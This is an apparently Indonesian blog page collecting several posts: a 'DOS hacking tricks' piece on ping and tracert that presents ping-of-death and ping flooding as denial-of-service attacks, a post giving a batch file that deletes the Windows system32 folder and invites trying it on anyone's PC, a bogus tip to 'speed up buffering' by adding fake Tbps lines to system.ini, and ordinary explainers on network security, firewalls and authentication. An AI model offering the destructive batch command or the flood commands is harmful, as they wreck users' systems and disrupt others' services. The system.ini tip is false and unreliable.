Trik Hacking Menggunakan DOS


Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna windows, berikut ini perintah-perintah hacking pada DOS.


1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms

Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert www.yahoo.com” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Trik Cara Mempercepat Buffering Video Tanpa Tools

Cara Mempercepat Buffering Video Tanpa Tools

Dengan Hanya Menggunakan Tools Notepad, anda bisa mempercepat buffering video di youtube atau di mana saja.

Caranya:
•Klik Start → RUN
•Di dalam box RUN, tulis → system.ini


•Kemudian akan muncul notepad yang ada tulisannya


•Sekarang, copy teks di bawah ini, paste di bawah teks yang tadi



page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps

Jadinya akan menjadi seperti gambar di bawah ini



•Simpan dan restart komputer anda
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Blokir Situs Dewasa Tanpa Tools

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan. Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Trik Menghancurkan Komputer

Menghancurkan Komputer

Ok langsung saja ke caranya :

1. Buka Notepad
2. lalu tulis perintah berikut: -

del c:WINDOWSsystem32*.*/q


3. Simpan notepad tersebut dengan ekstensi ".bat atau .cmd "
4. !!!!!!!!!!!!!!!!!!!!!! Perhatian !!!!!!!!!!!!!!!!!!! !
Jangan klik dua kali file tersebut kalau gak mau dalam kesulitan.

Mengapa ?????? file barusan yang kamu ciptakan menghapus semua file dari komputer ente ahakz,.....
folder system32 dan ketika kamu restart pc mu tidak akan mulai
coz sistem tidak dapat menemukan file dalam folder system32 yang
diperlukan pada saat booting.


5. Anda juga dapat menguji di atas dengan membuat folder palsu membiarkan rasa
windows1 di C: \. Menyalin beberapa file lama di dalamnya dan hanya mengikuti atau meniru nya saja asikasik
atas command.karena mengklik file yang kamu ganda atau copy bat atau cmd semua file otomatis bisa dihapus.
6. kamu dapat mencoba file ini di komputer manapun satu `s (tapi. ini menyebabkan menyebabkan kerusakan pada
komputer, jadi berpikir lagi sebelum mencoba ini di pc siapa pun apalagi di pc ente sendiri .
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Network Security: Apa dan Bagaimana?

Network Security: Apa dan Bagaimana?

Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang ‘menakutkan’ dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

* resiko / tingkat bahaya,
* ancaman, dan
* kerapuhan sistem (vulnerability)

Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

* Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
* Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
* Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

* Lapis ke-7 : Kebijaksanaan
* Lapis ke-6 : Personil
* Lapis ke-5 : Local Area Network
* Lapis ke-4 : Batas Dalam Jaringan
* Lapis ke-3 : Gateway
* Lapis ke-2 : Paket Filtering
* Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah “penyangga” yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.

Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep “TCP Wrapper”. Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. “sockd” dijalankan oleh “inetd” pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Firewall: Security Internet

Firewall: Security Internet

Internet merupakan sebuah jaringan komputer yang sangat terbuka di dunia, konsekuensi yang harus di tanggung adalah tidak ada jaminan keamanan bagi jaringan yang terkait ke Internet. Artinya jika operator jaringan tidak hati-hati dalam menset-up sistemnya, maka kemungkinan besar jaringan yang terkait ke Internet akan dengan mudah dimasuki orang yang tidak di undang dari luar. Adalah tugas dari operator jaringan yang bersangkutan, untuk menekan resiko tersebut seminimal mungkin. Pemilihan strategi dan kecakapan administrator jaringan ini, akan sangat membedakan apakah suatu jaringan mudah ditembus atau tidak.

Firewall merupakan alat untuk mengimplementasikan kebijakan security (security policy). Sedangkan kebijakan security, dibuat berdasarkan perimbangan antara fasilitas yang disediakan dengan implikasi security-nya. Semakin ketat kebijakan security, semakin kompleks konfigurasi layanan informasi atau semakin sedikit fasilitas yang tersedia di jaringan. Sebaliknya, dengan semakin banyak fasilitas yang tersedia atau sedemikian sederhananya konfigurasi yang diterapkan, maka semakin mudah orang orang ‘usil’ dari luar masuk kedalam sistem (akibat langsung dari lemahnya kebijakan security).

Tulisan ini akan mencoba melihat beberapa kebijakan sekuriti yang lazim digunakan pada saat mengkaitkan sebuah jaringan ke Internet.

Firewall

Firewall adalah istilah yang biasa digunakan untuk menunjuk pada suatu komponen atau sekumpulan komponen jaringan, yang berfungsi membatasi akses antara dua jaringan, lebih khusus lagi, antara jaringan internal dengan jaringan global Internet. Firewall mempunyai beberapa tugas :

* Pertama dan yang terpenting adalah: harus dapat mengimplementasikan kebijakan security di jaringan (site security policy). Jika aksi tertentu tidak diperbolehkan oleh kebijakan ini, maka firewall harus meyakinkan bahwa semua usaha yang mewakili operasi tersebut harus gagal atau digagalkan. Dengan demikian, semua akses ilegal antar jaringan (tidak diotorisasikan) akan ditolak.
* Melakukan filtering: mewajibkan semua traffik yang ada untuk dilewatkan melalui firewall bagi semua proses pemberian dan pemanfaatan layanan informasi. Dalam konteks ini, aliran paket data dari/menuju firewall, diseleksi berdasarkan IP-address, nomor port, atau arahnya, dan disesuaikan dengan kebijakan security.
* Firewall juga harus dapat merekam/mencatat even-even mencurigakan serta memberitahu administrator terhadap segala usaha-usaha menembus kebijakan security.

Merencanakan Jaringan Dengan Firewall

Merencanakan sistem firewall pada jaringan, berkaitan erat dengan jenis fasilitas apa yang akan disediakan bagi para pemakai, sejauh mana level resiko-security yang bisa diterima, serta berapa banyak waktu, biaya dan keahlian yang tersedia (faktor teknis dan ekonomis). Firewall umumnya terdiri dari bagian filter (disebut juga screen atau choke) dan bagian gateway (gate). Filter berfungsi untuk membatasi akses, mempersempit kanal, atau untuk memblok kelas trafik tertentu. Terjadinya pembatasan akses, berarti akan mengurangi fungsi jaringan. Untuk tetap menjaga fungsi komunikasi jaringan dalam lingkungan yang ber-firewall, umumnya ditempuh dua cara :

* Pertama, bila kita bayangkan jaringan kita berada dalam perlindungan sebuah benteng, komunikasi dapat terjadi melalui pintu-pintu keluar benteng tersebut. Cara ini dikenal sebagai packet-filtering, dimana filter hanya digunakan untuk menolak trafik pada kanal yang tidak digunakan atau kanal dengan resiko-security cukup besar, sedangkan trafik pada kanal yang lain masih tetap diperbolehkan.
* Cara kedua, menggunakan sistem proxy, dimana setiap komunikasi yang terjadi antar kedua jaringan harus dilakukan melalui suatu operator, dalam hal ini proxy server. Beberapa protokol, seperti telnet dan SMTP(Simple Mail Transport Protocol), akan lebih efektif ditangani dengan evaluasi paket (packet filtering), sedangkan yang lain seperti FTP (File Transport Protocol), Archie, Gopher dan HTTP (Hyper-Text Transport Protocol) akan lebih efektif ditangani dengan sistem proxy. Kebanyakan firewall menggunakan kombinasi kedua teknik ini (packet filtering dan proxy).

Ada banyak literatur yang membahas masalah security & membagi arsitektur dasar firewall menjadi tiga jenis. Masing masing adalah:

* arsitektur dengan dual-homed host (kadang kadang dikenal juga sebagai dual homed gateway/ DHG)
* screened-host (screened host gateway/ SHG) · screened subnet (screened subnet gateway/ SSG).

Sistem DHG menggunakan sebuah komputer dengan (paling sedikit) dua network-interface. Interface pertama dihubungkan dengan jaringan internal dan yang lainnya dengan Internet. Dual-homed host nya sendiri berfungsi sebagai bastion host (front terdepan, bagian terpenting dalam firewall).


Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screening-router dan bastion host. Router ini dikonfigurasi sedemikian sehingga akan menolak semua trafik kecuali yang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan cara ini setiap client servis pada jaringan internal dapat menggunakan fasilitas komunikasi standard dengan Internet tanpa harus melalui proxy.

Firewall dengan arsitektur screened-subnet menggunakan dua screening-router dan jaringan tengah (perimeter network) antara kedua router tersebut, dimana ditempatkan bastion host. Kelebihan susunan ini akan terlihat pada waktu optimasi penempatan server.

Selanjutnya, bagaimana relevansi arsitektur firewall tersebut terhadap level security? Suatu jaringan harus dapat menangani interaksi client-server, tidak terkecuali dengan kehadiran firewall. Sejauh ini, untuk operasi client internal – server internal, atau client internal – server eksternal, tidak terlalu menimbulkan masalah. Jika kita akan membuat sistem firewall untuk jaringan demikian, hanya dengan memasang proxy server pada bastion host dalam arsitektur yang dipilih, kualitas proteksi firewall yang bersangkutan akan maksimal. Artinya ‘keselamatan’ seluruh jaringan, sekarang hanya tergantung pada baik-tidaknya atau seberapa ‘bagus’ firewall tersebut dan tidak tergantung pada program-program yang lain. Beda halnya bila jaringan kita akan mendukung operasi client eksternal – server internal, atau dengan kata lain : jaringan internal kita menyediakan layanan informasi yang dapat diakses dari luar. Dalam konteks ini, harus diperhitungkan metoda penempatan mesin yang menjalankan program server, supaya mesin tersebut dapat dikenali dari internet dan sedemikian, komunikasi dengan client-nya dapat berlangsung dengan baik tanpa mengorbankan kepentingan security.
Arsitektur dual-homed menawarkan solusi sederhana dan murah. Satu-satunya mesin yang dikenal dari internet dalam sistem ini adalah dual-homed host-nya sendiri, dan dengan demikian ia menjadi satu-satunya mesin alternatif untuk menjalankan program server. Tetapi akan bermanfaat untuk mengingat, bahwa semakin banyak layanan yang disediakan atau semakin banyak program yang berjalan pada bastion-host, maka peluang penyusupan ke komputer tersebut semakin besar. Karena, seperti diyakini banyak orang, hampir dipastikan tidak ada program apapun yang bebas sama sekali dari bugs, apalagi untuk program-program berukuran besar. Dan sekali bugs ini dapat dieksploitasi oleh seseorang yang kemudian masuk ke dalam bastion-host, maka seluruh komputer di jaringan kita akan menjadi terbuka! Jika faktor ekonomis memaksa kita untuk tetap mengimplementasikan arsitektur DHG, maka ada beberapa nasihat yang patut diperhatikan, diantaranya: menggunakan perangkat lunak server yang telah teruji relatif ‘aman’ serta berukuran kecil, mereduksi dan mengoptimasi jumlah program yang berjalan, kemudian tidak memberikan account reguler pada bastion-host.
Dua arsitektur lainnya, screened-host dan screened-subnet, menyediakan pilihan lebih banyak. Screening-router dapat diatur untuk melakukan operasi packet filtering yang memungkinkan mesin-mesin tertentu dapat dikenali dari luar. Mesin mesin ini, kemudian menjalankan program-program server yang dapat diakses dari internet. Resiko dengan metoda seperti ini adalah penambahan jumlah komputer yang mungkin untuk diserang, sehingga akan lebih baik jika sebelumnya kita menyiapkan mesin-mesin tersebut dengan level security paling tidak sama dengan bastion-host atau kalau bisa, lebih.
Packet Filtering
Berbagai kebijakan dapat diterapkan dalam melakukan operasi packet filtering. Pada intinya, berupa mekanisme pengontrollan data yang diperbolehkan mengalir dari dan/atau ke jaringan internal, dengan menggunakan beberapa parameter yang tercantum dalam header paket data: arah (inbound atau outbound), address asal dan tujuan, port asal dan tujuan, serta jenis protokol transport. Router akan mengevaluasi informasi ini dalam setiap paket data yang mengalir melaluinya, kemudian menetapkan aksi yang harus dilakukan terhadap paket tersebut, berdasarkan set aturan/program dalam packet-filtering. Sehingga keputusan routing dasar router tersebut, kemudian dilengkapi dengan bagian dari kebijakan security jaringan.
Tabel berikut akan menunjukan contoh konfigurasi operasi packet-filtering, untuk menyediakan hanya fasilitas SMTP inbound dan outbound pada jaringan.
Aturan
Arah
Address Asal
Address Tujuan
Protokol
Port Tujuan
Aksi
A masuk eksternal internal TCP 25 ok
B keluar internal eksternal TCP >1023 ok
C keluar internal eksternal TCP 25 ok
D masuk eksternal internal TCP >1023 ok
E sembarang sembarang sembarang sembarang sembarang deny

Aturan A dan B melayani hubungan SMTP inbound (email datang), aturan C dan D melayani hubungan SMTP outbound (email keluar) serta aturan E merupakan aturan default yang dilakukan bila aturan aturan sebelumnya gagal. Kalau diamati lebih dekat, selain trafik SMTP konfigurasi tersebut juga masih membolehkan hubungan masuk dan keluar pada port >1023 (aturan B dan D), sehingga terdapat kemungkinan bagi program-program server seperti X11 (port 6000), OpenWindows (port 2000), atau kebanyakan program basis-data (Sybase, Oracle, Informix, dll), untuk dihubungi dari luar. Untuk menutup kemungkinan ini, diperlukan evaluasi parameter lain, seperti evaluasi port asal. Dengan cara ini, satu-satunya celah menembus firewall adalah dengan menggunakan port SMTP. Bila kita masih juga kurang yakin dengan kejujuran para pengguna port ini, dapat dilakukan evaluasi lebih lanjut dari informasi ACK.
Proxy
Dalam jaringan yang menerapkan sistem proxy, hubungan komunikasi ke internet dilakukan melalui sistem pendelegasian. Komputer-komputer yang dapat dikenali oleh internet bertindak sebagai ‘wakil’ bagi mesin lain yang ingin berhubungan ke luar. Proxy server untuk (kumpulan) protokol tertentu dijalankan pada dual-homed host atau bastion-host, dimana seluruh pemakai jaringan dapat berkomunikasi dengannya, kemudian proxy server ini bertindak sebagai delegasi. Dengan kata lain setiap program client akan berhubungan dengan proxy server dan proxy server ini lah yang akan berhubungan dengan server sebenarnya di internet. Proxy server akan mengevaluasi setiap permintaan hubungan dari client dan memutuskan mana yang diperbolehkan dan mana yang tidak. Bila permintaan hubungan ini disetujui, maka proxy server me-relay permintaan tersebut pada server sebenarnya.



Ada beberapa istilah menunjuk pada tipe proxy server, diantaranya proxy level aplikasi, proxy level circuit, proxy generik atau khusus, proxy cerdas dll. Apapun jenis proxy yang digunakan, ada beberapa konsekuensi implementasi sistem ini:

* pada umumnya memerlukan modifikasi client dan/atau prosedur akses serta menuntut penyediaan program server berbeda untuk setiap aplikasi.
* Penggunaan sistem proxy memungkinkan penggunaan private IP Address bagi jaringan internal. Konsekuensinya kita bisa memilih untuk menggunakan IP Address kelas A (10.x.x.x) untuk private IP address yang digunakan dalam jaringan internet; sehingga komputer yang dapat tersambung dalam jaringan internal dapat mencapai jumlah jutaan komputer.
* Paket SOCKS atau TIS FWTK merupakan contoh paket perangkat lunak proxy yang sering digunakan dan tersedia bebas di internet.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Mempercayai Password: Network Authentication

Mempercayai Password: Network Authentication

Aspek security jaringan berkaitan erat dengan servis yang disediakan: inbound atau outbound. Security pada servis outbound dapat diupayakan sebaik mungkin dengan konfigurasi firewall. Demikian pula dengan akses anonymous servis inbound, seperti anonymous FTP, HTTP, Gopher dll. Dalam hal ini, informasi sengaja disediakan bagi semua orang. Lain halnya bila kita ingin menyediakan akses non-anonymous (atau authenticated services), dimana selain melalui firewall, seseorang yang meminta akses juga harus mendapat ‘ijin’ server setelah terlebih dahulu membuktikan identitasnya. Inilah authentication. Untuk selanjutnya, penulis menggunakan istilah autentisasi sebagai sinonim kata tersebut.

RESIKO-SECURITY SERVIS INBOUND
Mengapa perlu autentisasi…..? Internet adalah jaringan publik, dan terbuka bagi setiap orang diseluruh penjuru dunia untuk menggabungkan diri. Begitu besarnya jaringan ini, telah menimbulkan keuntungan serta kerugian. Sering kita dengar dan baca tentang bobolnya sistem komputer keuangan bank, informasi rahasia Pentagon atau basis data transkrip akademik mahasiswa. Kalimat tersebut cukup untuk mewakili pernyataan bahwa kita harus ‘waspada’ terhadap orang-orang ‘jahat’ dan senantiasa berusaha memperkecil kemungkinan bagi mereka untuk dapat melakukan niat jahatnya. Memang mudah untuk meniadakan kemungkinan penyusupan (akses ilegal) dari luar dengan menutup semua kanal trafik servis inbound ke jaringan internal. Namun ini berarti telah mereduksi keuntungan utama adanya jaringan: komunikasi dan pemakaian sumber daya bersama (sharing resources). Jadi, konsekuensi alami dengan jaringan cukup besar, adalah menerima dan berusaha untuk memperkecil resiko ini, bukan meniadakannya.

Kita akan mulai dari seorang network-administrator (NA) yang telah melakukan tugasnya dengan baik, dalam menyiapkan ‘pertahanan’ bagi semua servis outbound dan anonymous-inbound. Perlu beberapa hal tambahan lagi yang sebaiknya diingat. Apakah pertahanan tersebut sudah cukup kuat bagi terjadinya pencurian hubungan (hijacking attack)? Apakah didalamnya sudah dipertimbangkan kemungkinan pemonitoran ilegal paket-paket informasi yang dikirimkan (packet sniffing – playback attack)? Atau apakah sudah termasuk kesiapan bagi benar-benar adanya akses ilegal didalam sistem (false authentication)?

